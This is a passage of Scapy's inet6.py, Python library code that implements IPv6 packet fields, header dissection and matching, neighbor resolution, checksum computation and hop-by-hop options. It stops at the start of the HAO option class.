#! /usr/bin/env python
|
#############################################################################
|
## ##
|
## inet6.py --- IPv6 support for Scapy ##
|
## see http://natisbad.org/IPv6/ ##
|
## for more information ##
|
## ##
|
## Copyright (C) 2005 Guillaume Valadon <guedou@hongo.wide.ad.jp> ##
|
## Arnaud Ebalard <arnaud.ebalard@eads.net> ##
|
## ##
|
## This program is free software; you can redistribute it and/or modify it ##
|
## under the terms of the GNU General Public License version 2 as ##
|
## published by the Free Software Foundation. ##
|
## ##
|
## This program is distributed in the hope that it will be useful, but ##
|
## WITHOUT ANY WARRANTY; without even the implied warranty of ##
|
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU ##
|
## General Public License for more details. ##
|
## ##
|
#############################################################################
|
|
"""
|
IPv6 (Internet Protocol v6).
|
"""
|
|
|
from __future__ import absolute_import
|
from __future__ import print_function
|
|
from hashlib import md5
|
import random
|
import re
|
import socket
|
import struct
|
from time import gmtime, strftime
|
|
import scapy.modules.six as six
|
from scapy.modules.six.moves import range, zip
|
# Import-time sanity checks on the socket module.
# The module refuses to load when the interpreter reports no IPv6 support.
if not socket.has_ipv6:
    raise socket.error("can't use AF_INET6, IPv6 is disabled")
# Some socket modules lack these protocol constants; define them when
# missing. 41 and 4 match the "IPv6" and "IP" entries of the ipv6nh table
# defined further down in this file.
if not hasattr(socket, "IPPROTO_IPV6"):
    # Workaround for http://bugs.python.org/issue6926
    socket.IPPROTO_IPV6 = 41
if not hasattr(socket, "IPPROTO_IPIP"):
    # Workaround for https://bitbucket.org/secdev/scapy/issue/5119
    socket.IPPROTO_IPIP = 4
|
|
from scapy.arch import get_if_hwaddr
|
from scapy.config import conf
|
from scapy.base_classes import Gen
|
from scapy.data import DLT_IPV6, DLT_RAW, DLT_RAW_ALT, ETHER_ANY, ETH_P_IPV6, \
|
MTU
|
from scapy.compat import chb, orb, raw, plain_str
|
import scapy.consts
|
from scapy.fields import BitEnumField, BitField, ByteEnumField, ByteField, \
|
DestField, Field, FieldLenField, FlagsField, IntField, LongField, \
|
MACField, PacketLenField, PacketListField, ShortEnumField, ShortField, \
|
StrField, StrFixedLenField, StrLenField, X3BytesField, XBitField, \
|
XIntField, XShortField
|
from scapy.packet import bind_layers, Packet, Raw
|
from scapy.volatile import RandInt, RandIP6, RandShort
|
from scapy.sendrecv import sendp, sniff, sr, srp1
|
from scapy.as_resolvers import AS_resolver_riswhois
|
from scapy.supersocket import SuperSocket, L3RawSocket
|
from scapy.utils6 import in6_6to4ExtractAddr, in6_and, in6_cidr2mask, \
|
in6_getnsma, in6_getnsmac, in6_isaddr6to4, in6_isaddrllallnodes, \
|
in6_isaddrllallservers, in6_isaddrTeredo, in6_isllsnmaddr, in6_ismaddr, \
|
in6_ptop, teredoAddrExtractInfo
|
from scapy.layers.l2 import CookedLinux, Ether, GRE, Loopback, SNAP
|
from scapy.layers.inet import IP, IPTools, TCP, TCPerror, TracerouteResult, \
|
UDP, UDPerror
|
from scapy.utils import checksum, inet_pton, inet_ntop, strxor
|
from scapy.error import warning
|
if conf.route6 is None:
|
# unused import, only to initialize conf.route6
|
import scapy.route6
|
|
|
#############################################################################
|
# Helpers ##
|
#############################################################################
|
|
def get_cls(name, fallback_cls):
    """Look up ``name`` among this module's globals.

    Returns the object bound to ``name`` at module level, or
    ``fallback_cls`` when no such global exists.
    """
    module_names = globals()
    if name in module_names:
        return module_names[name]
    return fallback_cls
|
|
|
##########################
|
## Neighbor cache stuff ##
|
##########################
|
|
conf.netcache.new_cache("in6_neighbor", 120)
|
|
@conf.commands.register
def neighsol(addr, src, iface, timeout=1, chainCC=0):
    """Send an ICMPv6 Neighbor Solicitation to resolve the MAC address of addr.

    The solicitation is sent on 'iface' with 'src' as IPv6 source address,
    to the solicited-node multicast address derived from 'addr'.

    'timeout' is the number of seconds to wait for an answer (1 by default)
    and 'chainCC' is handed over to the sending function.

    If no answer is gathered, None is returned. Else, the answer is
    returned (ethernet frame).
    """
    # Solicited-node multicast address and the matching multicast MAC
    nsma = in6_getnsma(inet_pton(socket.AF_INET6, addr))
    d = inet_ntop(socket.AF_INET6, nsma)
    dm = in6_getnsmac(nsma)

    p = Ether(dst=dm) / IPv6(dst=d, src=src, hlim=255)
    p /= ICMPv6ND_NS(tgt=addr)
    p /= ICMPv6NDOptSrcLLAddr(lladdr=get_if_hwaddr(iface))

    # Honour the caller-supplied timeout (it used to be hard-coded to 1).
    return srp1(p, type=ETH_P_IPV6, iface=iface, timeout=timeout, verbose=0,
                chainCC=chainCC)
|
|
@conf.commands.register
def getmacbyip6(ip6, chainCC=0):
    """Return the MAC address to use for reaching an IPv6 address.

    Multicast destinations are mapped directly to their multicast MAC.
    Otherwise the route is looked up, the neighbor cache
    (conf.netcache.in6_neighbor) is consulted for the next hop (or for the
    address itself when the next hop is '::'), and as a last resort a
    Neighbor Solicitation is sent through neighsol().

    (chainCC parameter value ends up being passed to the sending function
    used to perform the resolution, if needed)

    None is returned when the resolution got no answer.
    """
    if isinstance(ip6, Net6):
        ip6 = str(ip6)

    if in6_ismaddr(ip6):  # Multicast
        return in6_getnsmac(inet_pton(socket.AF_INET6, ip6))

    out_iface, src_addr, next_hop = conf.route6.route(ip6)

    if out_iface == scapy.consts.LOOPBACK_INTERFACE:
        return "ff:ff:ff:ff:ff:ff"

    # Resolve the next hop when the route provides one
    target = ip6 if next_hop == '::' else next_hop

    cached = conf.netcache.in6_neighbor.get(target)
    if cached:
        return cached

    reply = neighsol(target, src_addr, out_iface, chainCC=chainCC)
    if reply is None:
        return None

    if ICMPv6NDOptDstLLAddr in reply:
        resolved = reply[ICMPv6NDOptDstLLAddr].lladdr
    else:
        resolved = reply.src
    conf.netcache.in6_neighbor[target] = resolved
    return resolved
|
|
|
#############################################################################
|
#############################################################################
|
### IPv6 addresses manipulation routines ###
|
#############################################################################
|
#############################################################################
|
|
class Net6(Gen):  # syntax ex. fec0::/126
    """Generate a list of IPv6s from a network address or a name"""
    name = "ipv6"
    ip_regex = re.compile(r"^([a-fA-F0-9:]+)(/[1]?[0-3]?[0-9])?$")

    def __init__(self, net):
        """Parse 'net' ("address[/plen]" or a host name) into net/mask/plen."""
        self.repr = net

        # A missing prefix length defaults to /128
        parts = net.split('/') + ["128"]
        if self.ip_regex.match(net) is None:
            # Not a literal address: resolve it as a name
            parts[0] = socket.getaddrinfo(parts[0], None,
                                          socket.AF_INET6)[0][-1][0]

        prefix_len = int(parts[1])
        self.net = inet_pton(socket.AF_INET6, parts[0])
        self.mask = in6_cidr2mask(prefix_len)
        self.plen = prefix_len

    def __iter__(self):
        """Iterate over the textual form of every address of the network.

        As a side effect, self.parsed is set to the list of per-byte
        (start, stop) ranges that are enumerated.
        """

        def byte_bounds(octet, free_bits):
            # free_bits: number of host bits of this byte, clamped to 0..8
            free_bits = min(8, max(free_bits, 0))
            octet = int(octet)
            return (octet & (0xff << free_bits),
                    (octet | (0xff >> (8 - free_bits))) + 1)

        masked_bytes = struct.unpack("16B", in6_and(self.net, self.mask))
        self.parsed = [
            byte_bounds(octet, last_bit - self.plen)
            for octet, last_bit in zip(masked_bytes, range(8, 129, 8))
        ]

        # Grow the address strings one byte at a time; the value of the
        # byte being appended is the outer loop, as in a left fold.
        addresses = ['']
        for position, bounds in enumerate(self.parsed):
            separator = ':' if position and position % 2 == 0 else ''
            addresses = [prefix + separator + '%.2x' % value
                         for value in range(*bounds)
                         for prefix in addresses]

        return iter(addresses)

    def __str__(self):
        """Return the first generated address (None when there is none)."""
        try:
            first = next(self.__iter__())
        except StopIteration:
            return None
        return first

    def __eq__(self, other):
        """Two values are equal when their string forms are equal."""
        return str(other) == str(self)

    def __ne__(self, other):
        """Inverse of __eq__, based on the string forms."""
        return str(other) != str(self)

    def __repr__(self):
        return "Net6(%r)" % self.repr
|
|
|
|
|
|
|
#############################################################################
|
#############################################################################
|
### IPv6 Class ###
|
#############################################################################
|
#############################################################################
|
|
class IP6Field(Field):
    """Field holding one IPv6 address, packed as 16 raw bytes ("16s")."""

    def __init__(self, name, default):
        Field.__init__(self, name, default, "16s")

    def h2i(self, pkt, x):
        """Normalise a human value.

        A str goes through in6_ptop() and becomes a Net6 when that raises
        socket.error; every element of a list is turned into a Net6; other
        values are returned untouched.
        """
        if isinstance(x, list):
            return [Net6(entry) for entry in x]
        if isinstance(x, str):
            try:
                return in6_ptop(x)
            except socket.error:
                return Net6(x)
        return x

    def i2m(self, pkt, x):
        """Pack the textual address into its binary form."""
        return inet_pton(socket.AF_INET6, plain_str(x))

    def m2i(self, pkt, x):
        """Turn the binary address into its textual form."""
        return inet_ntop(socket.AF_INET6, x)

    def any2i(self, pkt, x):
        return self.h2i(pkt, x)

    def i2repr(self, pkt, x):
        """Human form, with extra details for Teredo and 6to4 addresses."""
        if x is None:
            return self.i2h(pkt, x)
        if not isinstance(x, (Net6, list)):
            if in6_isaddrTeredo(x):  # print Teredo info
                server, _, maddr, mport = teredoAddrExtractInfo(x)
                return "%s [Teredo srv: %s cli: %s:%s]" % (self.i2h(pkt, x), server, maddr, mport)
            if in6_isaddr6to4(x):  # print encapsulated address
                vaddr = in6_6to4ExtractAddr(x)
                return "%s [6to4 GW: %s]" % (self.i2h(pkt, x), vaddr)
        # No specific information to return
        return self.i2h(pkt, x)

    def randval(self):
        return RandIP6()
|
|
class SourceIP6Field(IP6Field):
    """IPv6 source address field whose value is derived from the route.

    When the field value is None, the source address is the one returned by
    conf.route6.route() for the destination found in the packet field named
    'dstname' ("::" is used when 'dstname' is None).
    """
    __slots__ = ["dstname"]

    def __init__(self, name, dstname):
        IP6Field.__init__(self, name, None)
        self.dstname = dstname

    def i2m(self, pkt, x):
        """Machine value; an unset source is resolved through the route."""
        if x is None:
            # Same fallback as i2h(): without a destination field name,
            # route towards "::" instead of calling getattr(pkt, None).
            dst = ("::" if self.dstname is None
                   else getattr(pkt, self.dstname))
            x = conf.route6.route(dst)[1]
        return IP6Field.i2m(self, pkt, x)

    def i2h(self, pkt, x):
        """Human value; an unset source is resolved through the route."""
        if x is None:
            if conf.route6 is None:
                # unused import, only to initialize conf.route6
                import scapy.route6
            dst = ("::" if self.dstname is None else getattr(pkt, self.dstname))
            if isinstance(dst, (Gen, list)):
                # Several destinations: collect the distinct routes and
                # warn when they do not all agree.
                r = {conf.route6.route(daddr) for daddr in dst}
                if len(r) > 1:
                    warning("More than one possible route for %r" % (dst,))
                x = min(r)[1]
            else:
                x = conf.route6.route(dst)[1]
        return IP6Field.i2h(self, pkt, x)
|
|
class DestIP6Field(IP6Field, DestField):
    """IPv6 destination field; an unset value comes from dst_from_pkt()."""
    bindings = {}

    def __init__(self, name, default):
        IP6Field.__init__(self, name, None)
        DestField.__init__(self, name, default)

    def i2m(self, pkt, x):
        value = self.dst_from_pkt(pkt) if x is None else x
        return IP6Field.i2m(self, pkt, value)

    def i2h(self, pkt, x):
        value = self.dst_from_pkt(pkt) if x is None else x
        return IP6Field.i2h(self, pkt, value)
|
|
# Next Header value -> human readable name (used by the "nh" enum fields)
ipv6nh = {
    0: "Hop-by-Hop Option Header",
    4: "IP",
    6: "TCP",
    17: "UDP",
    41: "IPv6",
    43: "Routing Header",
    44: "Fragment Header",
    47: "GRE",
    50: "ESP Header",
    51: "AH Header",
    58: "ICMPv6",
    59: "No Next Header",
    60: "Destination Option Header",
    112: "VRRP",
    132: "SCTP",
    135: "Mobility Header",
}
|
|
# Next Header value -> name of the class used to dissect the payload.
# Names (not classes) are stored; they are resolved through get_cls().
ipv6nhcls = {
    0: "IPv6ExtHdrHopByHop",
    4: "IP",
    6: "TCP",
    17: "UDP",
    43: "IPv6ExtHdrRouting",
    44: "IPv6ExtHdrFragment",
    # 50: "IPv6ExtHrESP",
    # 51: "IPv6ExtHdrAH",
    58: "ICMPv6Unknown",
    59: "Raw",
    60: "IPv6ExtHdrDestOpt",
}
|
|
class IP6ListField(StrField):
    """Field holding a list of IPv6 addresses, 16 bytes each on the wire.

    The amount of data to dissect is given either by 'length_from' (a
    number of bytes) or by 'count_from' (a number of addresses); both are
    callables taking the packet. 'length_from' wins when both are set.
    """
    __slots__ = ["count_from", "length_from"]
    islist = 1

    def __init__(self, name, default, count_from=None, length_from=None):
        if default is None:
            default = []
        StrField.__init__(self, name, default)
        self.count_from = count_from
        self.length_from = length_from

    def i2len(self, pkt, i):
        """Length in bytes of the built list."""
        return 16 * len(i)

    def i2count(self, pkt, i):
        """Number of addresses (0 when the value is not a list)."""
        if isinstance(i, list):
            return len(i)
        return 0

    def getfield(self, pkt, s):
        """Dissect addresses from s; return (remaining bytes, address list)."""
        c = l = None
        if self.length_from is not None:
            l = self.length_from(pkt)
        elif self.count_from is not None:
            c = self.count_from(pkt)

        lst = []
        ret = b""
        remain = s
        if l is not None:
            # Only the first l bytes belong to this field
            remain, ret = s[:l], s[l:]
        while remain:
            if c is not None:
                if c <= 0:
                    break
                c -= 1
            addr = inet_ntop(socket.AF_INET6, remain[:16])
            lst.append(addr)
            remain = remain[16:]
        return remain + ret, lst

    def i2m(self, pkt, x):
        """Pack every address; values that fail to pack are resolved as names."""
        packed = []
        for y in x:
            try:
                y = inet_pton(socket.AF_INET6, y)
            except Exception:
                # Not a literal address: resolve it, then pack the result.
                # (Exception rather than a bare except, so that
                # KeyboardInterrupt/SystemExit are not swallowed.)
                y = socket.getaddrinfo(y, None, socket.AF_INET6)[0][-1][0]
                y = inet_pton(socket.AF_INET6, y)
            packed.append(y)
        return b"".join(packed)

    def i2repr(self, pkt, x):
        """Bracketed, comma separated representation of the list."""
        if x is None:
            return "[]"
        return "[ %s ]" % (", ".join('%s' % y for y in x))
|
|
class _IPv6GuessPayload:
    name = "Dummy class that implements guess_payload_class() for IPv6"

    def default_payload_class(self, p):
        """Select the payload class from self.nh and the payload bytes p.

        Class names found in the lookup tables are resolved with get_cls();
        Raw is the fallback whenever nothing more specific is found.
        """
        if self.nh == 58:  # ICMPv6
            t = orb(p[0])
            if len(p) > 2 and (t == 139 or t == 140):  # Node Info Query
                return _niquery_guesser(p)
            # Other ICMPv6 messages: only when p is at least as long as the
            # minimal header length registered for that type
            if len(p) >= icmp6typesminhdrlen.get(t, float("inf")):
                # Fall back on the Raw class itself (the fallback used to
                # be the string "Raw", which is not a usable class).
                return get_cls(icmp6typescls.get(t, "Raw"), Raw)
            return Raw
        elif self.nh == 135 and len(p) > 3:  # Mobile IPv6
            return _mip6_mhtype2cls.get(orb(p[2]), MIP6MH_Generic)
        elif self.nh == 43 and len(p) > 2 and orb(p[2]) == 4:
            # Segment Routing header. The length guard avoids an IndexError
            # on p[2] when the payload is shorter than 3 bytes.
            return IPv6ExtHdrSegmentRouting
        return get_cls(ipv6nhcls.get(self.nh, "Raw"), Raw)
|
|
class IPv6(_IPv6GuessPayload, Packet, IPTools):
    """IPv6 header."""
    name = "IPv6"
    fields_desc = [BitField("version", 6, 4),
                   BitField("tc", 0, 8),  # TODO: IPv6, ByteField ?
                   BitField("fl", 0, 20),
                   ShortField("plen", None),
                   ByteEnumField("nh", 59, ipv6nh),
                   ByteField("hlim", 64),
                   SourceIP6Field("src", "dst"),  # dst is for src @ selection
                   DestIP6Field("dst", "::1")]

    def route(self):
        """Return conf.route6.route() for the (first) destination."""
        dst = self.dst
        if isinstance(dst, Gen):
            dst = next(iter(dst))
        return conf.route6.route(dst)

    def mysummary(self):
        return "%s > %s (%i)" % (self.src, self.dst, self.nh)

    def post_build(self, p, pay):
        """Append the payload and fill in 'plen' when it was left to None."""
        p += pay
        if self.plen is None:
            # Payload length excludes the 40 bytes of the fixed header
            l = len(p) - 40
            p = p[:4] + struct.pack("!H", l) + p[6:]
        return p

    def extract_padding(self, s):
        """Split s after 'plen' bytes: (payload, padding)."""
        l = self.plen
        return s[:l], s[l:]

    def hashret(self):
        """Return the hash used to pair requests with their answers."""
        if self.nh == 58 and isinstance(self.payload, _ICMPv6):
            if self.payload.type < 128:
                return self.payload.payload.hashret()
            elif (self.payload.type in [133, 134, 135, 136, 144, 145]):
                return struct.pack("B", self.nh) + self.payload.hashret()

        if not conf.checkIPinIP and self.nh in [4, 41]:  # IP, IPv6
            return self.payload.hashret()

        nh = self.nh
        sd = self.dst
        ss = self.src
        if self.nh == 43 and isinstance(self.payload, IPv6ExtHdrRouting):
            # With routing header, the destination is the last
            # address of the IPv6 list if segleft > 0
            # NOTE(review): 'addresses' is not a field of this class;
            # presumably the lookup is forwarded to the payload - confirm.
            nh = self.payload.nh
            try:
                sd = self.addresses[-1]
            except IndexError:
                sd = '::1'
            # TODO: big bug with ICMPv6 error messages as the destination of IPerror6
            #       could be anything from the original list ...
            sd = inet_pton(socket.AF_INET6, sd)
            for a in self.addresses:
                a = inet_pton(socket.AF_INET6, a)
                sd = strxor(sd, a)
            sd = inet_ntop(socket.AF_INET6, sd)

        if self.nh == 43 and isinstance(self.payload, IPv6ExtHdrSegmentRouting):
            # With segment routing header (rh == 4), the destination is
            # the first address of the IPv6 addresses list
            try:
                sd = self.addresses[0]
            except IndexError:
                sd = self.dst

        if self.nh == 44 and isinstance(self.payload, IPv6ExtHdrFragment):
            nh = self.payload.nh

        if self.nh == 0 and isinstance(self.payload, IPv6ExtHdrHopByHop):
            nh = self.payload.nh

        if self.nh == 60 and isinstance(self.payload, IPv6ExtHdrDestOpt):
            foundhao = None
            for o in self.payload.options:
                if isinstance(o, HAO):
                    foundhao = o
            if foundhao:
                nh = self.payload.nh  # XXX what if another extension follows ?
                ss = foundhao.hoa

        if conf.checkIPsrc and conf.checkIPaddr and not in6_ismaddr(sd):
            sd = inet_pton(socket.AF_INET6, sd)
            # Use the source selected above (the Home Address when a HAO
            # option was found) instead of unconditionally re-reading
            # self.src, which made the HAO handling a no-op.
            ss = inet_pton(socket.AF_INET6, ss)
            return strxor(sd, ss) + struct.pack("B", nh) + self.payload.hashret()
        else:
            return struct.pack("B", nh) + self.payload.hashret()

    def answers(self, other):
        """Tell whether self (the reply) answers other (the request)."""
        if not conf.checkIPinIP:  # skip IP in IP and IPv6 in IP
            if self.nh in [4, 41]:
                return self.payload.answers(other)
            if isinstance(other, IPv6) and other.nh in [4, 41]:
                return self.answers(other.payload)
            if isinstance(other, IP) and other.proto in [4, 41]:
                return self.answers(other.payload)
        if not isinstance(other, IPv6):  # self is reply, other is request
            return False
        if conf.checkIPaddr:
            # ss = inet_pton(socket.AF_INET6, self.src)
            sd = inet_pton(socket.AF_INET6, self.dst)
            os = inet_pton(socket.AF_INET6, other.src)
            od = inet_pton(socket.AF_INET6, other.dst)
            # request was sent to a multicast address (other.dst)
            # Check reply destination addr matches request source addr (i.e
            # sd == os) except when reply is multicasted too
            # XXX test mcast scope matching ?
            if in6_ismaddr(other.dst):
                if in6_ismaddr(self.dst):
                    if ((od == sd) or
                            (in6_isaddrllallnodes(self.dst) and in6_isaddrllallservers(other.dst))):
                        return self.payload.answers(other.payload)
                    return False
                if (os == sd):
                    return self.payload.answers(other.payload)
                return False
            elif (sd != os):  # or ss != od): <- removed for ICMP errors
                return False
        if self.nh == 58 and isinstance(self.payload, _ICMPv6) and self.payload.type < 128:
            # ICMPv6 Error message -> generated by IPv6 packet
            # Note : at the moment, we jump the ICMPv6 specific class
            # to call answers() method of erroneous packet (over
            # initial packet). There can be cases where an ICMPv6 error
            # class could implement a specific answers method that perform
            # a specific task. Currently, don't see any use ...
            return self.payload.payload.answers(other)
        elif other.nh == 0 and isinstance(other.payload, IPv6ExtHdrHopByHop):
            return self.payload.answers(other.payload.payload)
        elif other.nh == 44 and isinstance(other.payload, IPv6ExtHdrFragment):
            return self.payload.answers(other.payload.payload)
        elif other.nh == 43 and isinstance(other.payload, IPv6ExtHdrRouting):
            return self.payload.answers(other.payload.payload)  # Buggy if self.payload is a IPv6ExtHdrRouting
        elif other.nh == 43 and isinstance(other.payload, IPv6ExtHdrSegmentRouting):
            return self.payload.answers(other.payload.payload)  # Buggy if self.payload is a IPv6ExtHdrRouting
        elif other.nh == 60 and isinstance(other.payload, IPv6ExtHdrDestOpt):
            return self.payload.payload.answers(other.payload.payload)
        elif self.nh == 60 and isinstance(self.payload, IPv6ExtHdrDestOpt):  # BU in reply to BRR, for instance
            return self.payload.payload.answers(other.payload)
        else:
            if (self.nh != other.nh):
                return False
            return self.payload.answers(other.payload)
|
|
|
class _IPv46(IP):
    """
    This class implements a dispatcher that is used to detect the IP version
    while parsing Raw IP pcap files.
    """
    @classmethod
    def dispatch_hook(cls, _pkt=None, *_, **kargs):
        """Return IPv6 or IP.

        With data, the high nibble of the first byte decides; without data,
        the 'version' keyword argument does.
        """
        if _pkt:
            wants_v6 = (orb(_pkt[0]) >> 4) == 6
        else:
            wants_v6 = kargs.get("version") == 6
        return IPv6 if wants_v6 else IP
|
|
|
def inet6_register_l3(l2, l3):
    """Neighbor resolver for Ether/IPv6: MAC address of the l3 destination.

    'l2' is not used.
    """
    destination = l3.dst
    return getmacbyip6(destination)


conf.neighbor.register_l3(Ether, IPv6, inet6_register_l3)
|
|
|
class IPerror6(IPv6):
    """IPv6 header as quoted inside an ICMPv6 error message."""
    name = "IPv6 in ICMPv6"

    def answers(self, other):
        """Tell whether this quoted packet corresponds to 'other'.

        'other' is the packet that was sent. The match requires self to sit
        under an ICMPv6 error (type < 128), the addresses to agree (the
        destination is not checked when the request carries a Routing
        Header) and the upper layers to share a common leading part.
        """
        if not isinstance(other, IPv6):
            return False
        sd = inet_pton(socket.AF_INET6, self.dst)
        ss = inet_pton(socket.AF_INET6, self.src)
        od = inet_pton(socket.AF_INET6, other.dst)
        os = inet_pton(socket.AF_INET6, other.src)

        # Make sure that the ICMPv6 error is related to the packet scapy sent
        if not (isinstance(self.underlayer, _ICMPv6) and
                self.underlayer.type < 128):
            return False

        # find upper layer for self (possible citation)
        selfup = self.payload
        while selfup is not None and isinstance(selfup, _IPv6ExtHdr):
            selfup = selfup.payload

        # find upper layer for other (initial packet). Also look for RH
        otherup = other.payload
        request_has_rh = False
        while otherup is not None and isinstance(otherup, _IPv6ExtHdr):
            if isinstance(otherup, IPv6ExtHdrRouting):
                request_has_rh = True
            otherup = otherup.payload

        # Basic case: same source and destination. When the request has a
        # Routing Header, the destination address is not checked.
        if not (ss == os and (sd == od or request_has_rh)):
            return False

        def same_leading_bytes():
            # The quoted packet may be truncated: compare the common part
            s1 = raw(selfup)
            s2 = raw(otherup)
            l = min(len(s1), len(s2))
            return s1[:l] == s2[:l]

        # Let's deal with possible MSS Clamping
        if not (isinstance(selfup, TCP) and
                isinstance(otherup, TCP) and
                selfup.options != otherup.options):  # does not seem clamped
            return same_leading_bytes()

        # Save fields modified by MSS clamping
        saved = [(layer, layer.options, layer.chksum, layer.dataofs)
                 for layer in (otherup, selfup)]
        try:
            # Nullify them, then test
            for layer in (otherup, selfup):
                layer.options = []
                layer.chksum = 0
                layer.dataofs = 0
            return same_leading_bytes()
        finally:
            # Recall saved values, even when building the packets failed
            for layer, options, chksum, dataofs in saved:
                layer.options = options
                layer.chksum = chksum
                layer.dataofs = dataofs

    def mysummary(self):
        return Packet.mysummary(self)
|
|
|
#############################################################################
|
#############################################################################
|
### Upper Layer Checksum computation ###
|
#############################################################################
|
#############################################################################
|
|
class PseudoIPv6(Packet):
    """IPv6 pseudo-header, built only to compute upper layer checksums."""
    name = "Pseudo IPv6 Header"
    fields_desc = [
        IP6Field("src", "::"),
        IP6Field("dst", "::"),
        ShortField("uplen", None),
        BitField("zero", 0, 24),
        ByteField("nh", 0),
    ]
|
|
def in6_chksum(nh, u, p):
    """
    As Specified in RFC 2460 - 8.1 Upper-Layer Checksums

    Performs IPv6 Upper Layer checksum computation. Provided parameters are:
    - 'nh' : value of upper layer protocol
    - 'u'  : upper layer instance (TCP, UDP, ICMPv6*, ). Instance must be
             provided with all under layers (IPv6 and all extension headers,
             for example)
    - 'p'  : the payload of the upper layer provided as a string

    Functions operate by filling a pseudo header class instance (PseudoIPv6)
    with
    - Next Header value
    - the address of _final_ destination (if some Routing Header with non
    null segleft field is present in underlayer classes, last address is
    used; first address for a Segment Routing Header.)
    - the address of _real_ source (basically the source address of an
    IPv6 class instance available in the underlayer or the source address
    in HAO option if some Destination Option header found in underlayer
    includes this option).
    - the length is the length of provided payload string ('p')

    Returns the checksum, or 0 (after a warning) when no IPv6 layer is found
    in the underlayers.
    """

    ph6 = PseudoIPv6()
    ph6.nh = nh
    rthdr = 0
    hahdr = 0
    final_dest_addr_found = 0
    # Walk down the underlayers until the IPv6 header is reached.
    # Identity test against None: no need to involve packet comparison.
    while u is not None and not isinstance(u, IPv6):
        if (isinstance(u, IPv6ExtHdrRouting) and
                u.segleft != 0 and len(u.addresses) != 0 and
                final_dest_addr_found == 0):
            rthdr = u.addresses[-1]
            final_dest_addr_found = 1
        elif (isinstance(u, IPv6ExtHdrSegmentRouting) and
                u.segleft != 0 and len(u.addresses) != 0 and
                final_dest_addr_found == 0):
            rthdr = u.addresses[0]
            final_dest_addr_found = 1
        elif (isinstance(u, IPv6ExtHdrDestOpt) and (len(u.options) == 1) and
                isinstance(u.options[0], HAO)):
            hahdr = u.options[0].hoa
        u = u.underlayer
    if u is None:
        warning("No IPv6 underlayer to compute checksum. Leaving null.")
        return 0
    if hahdr:
        ph6.src = hahdr
    else:
        ph6.src = u.src
    if rthdr:
        ph6.dst = rthdr
    else:
        ph6.dst = u.dst
    ph6.uplen = len(p)
    ph6s = raw(ph6)
    return checksum(ph6s + p)
|
|
|
#############################################################################
|
#############################################################################
|
### Extension Headers ###
|
#############################################################################
|
#############################################################################
|
|
|
# Inherited by all extension header classes
|
class _IPv6ExtHdr(_IPv6GuessPayload, Packet):
    """Common base class of the IPv6 extension header classes."""
    name = 'Abstract IPV6 Option Header'
    aliastypes = [IPv6, IPerror6]  # TODO ...
|
|
|
#################### IPv6 options for Extension Headers #####################
|
|
_hbhopts = { 0x00: "Pad1",
|
0x01: "PadN",
|
0x04: "Tunnel Encapsulation Limit",
|
0x05: "Router Alert",
|
0x06: "Quick-Start",
|
0xc2: "Jumbo Payload",
|
0xc9: "Home Address Option" }
|
|
class _OTypeField(ByteEnumField):
    """
    Modified ByteEnumField that displays information regarding the IPv6 option
    based on its option type value (What should be done by nodes that process
    the option if they do not understand it ...)

    It is used by Jumbo, Pad1, PadN, RouterAlert, HAO options
    """
    # Meaning of the two highest-order bits of the option type
    pol = {
        0x00: "00: skip",
        0x40: "01: discard",
        0x80: "10: discard+ICMP",
        0xC0: "11: discard+ICMP not mcast",
    }

    # Meaning of the third highest-order bit of the option type
    enroutechange = {
        0x00: "0: Don't change en-route",
        0x20: "1: May change en-route",
    }

    def i2repr(self, pkt, x):
        """Option name followed by the decoded action and en-route bits."""
        label = self.i2s.get(x, repr(x))
        action = self.pol[x & 0xC0]
        mutability = self.enroutechange[x & 0x20]
        return "%s [%s, %s]" % (label, action, mutability)
|
|
class HBHOptUnknown(Packet):  # IPv6 Hop-By-Hop Option
    """Generic type/length/data option, used for unrecognised option types."""
    name = "Scapy6 Unknown Option"
    fields_desc = [
        _OTypeField("otype", 0x01, _hbhopts),
        FieldLenField("optlen", None, length_of="optdata", fmt="B"),
        StrLenField("optdata", "", length_from=lambda pkt: pkt.optlen),
    ]

    def alignment_delta(self, curpos):  # By default, no alignment requirement
        """
        As specified in section 4.2 of RFC 2460, every option has
        an alignment requirement usually expressed xn+y, meaning
        the Option Type must appear at an integer multiple of x octets
        from the start of the header, plus y octets.

        That function is provided the current position from the
        start of the header and returns required padding length.
        """
        return 0
|
|
class Pad1(Packet):  # IPv6 Hop-By-Hop Option
    """Pad1 option: a lone option type byte."""
    name = "Pad1"
    fields_desc = [_OTypeField("otype", 0x00, _hbhopts)]

    def alignment_delta(self, curpos):
        """Padding needed before this option: none (no alignment requirement)."""
        return 0
|
|
class PadN(Packet):  # IPv6 Hop-By-Hop Option
    """PadN option: type, length and 'optlen' bytes of padding data."""
    name = "PadN"
    fields_desc = [
        _OTypeField("otype", 0x01, _hbhopts),
        FieldLenField("optlen", None, length_of="optdata", fmt="B"),
        StrLenField("optdata", "", length_from=lambda pkt: pkt.optlen),
    ]

    def alignment_delta(self, curpos):
        """Padding needed before this option: none (no alignment requirement)."""
        return 0
|
|
class RouterAlert(Packet):  # RFC 2711 - IPv6 Hop-By-Hop Option
    """Router Alert option."""
    name = "Router Alert"
    fields_desc = [
        _OTypeField("otype", 0x05, _hbhopts),
        ByteField("optlen", 2),
        ShortEnumField("value", None,
                       {0: "Datagram contains a MLD message",
                        1: "Datagram contains RSVP message",
                        2: "Datagram contains an Active Network message",
                        68: "NSIS NATFW NSLP",
                        69: "MPLS OAM",
                        65535: "Reserved"}),
    ]
    # TODO : Check IANA has not defined new values for value field of RouterAlertOption
    # TODO : Now that we have that option, we should do something in MLD class that need it
    # TODO : IANA has defined ranges of values which can't be easily represented here.
    #        iana.org/assignments/ipv6-routeralert-values/ipv6-routeralert-values.xhtml

    def alignment_delta(self, curpos):  # alignment requirement : 2n+0
        """Number of padding bytes needed so the option starts at 2n+0."""
        multiple, offset = 2, 0
        # Distance from curpos up to the next position of the form
        # multiple*n + offset (0 when curpos already qualifies)
        return (offset - curpos) % multiple
|
|
class Jumbo(Packet):  # IPv6 Hop-By-Hop Option
    """Jumbo Payload option carrying a 32-bit payload length."""
    name = "Jumbo Payload"
    fields_desc = [
        _OTypeField("otype", 0xC2, _hbhopts),
        ByteField("optlen", 4),
        IntField("jumboplen", None),
    ]

    def alignment_delta(self, curpos):  # alignment requirement : 4n+2
        """Number of padding bytes needed so the option starts at 4n+2."""
        multiple, offset = 4, 2
        # Distance from curpos up to the next position of the form
        # multiple*n + offset (0 when curpos already qualifies)
        return (offset - curpos) % multiple
|
|
class HAO(Packet):  # IPv6 Destination Options Header Option
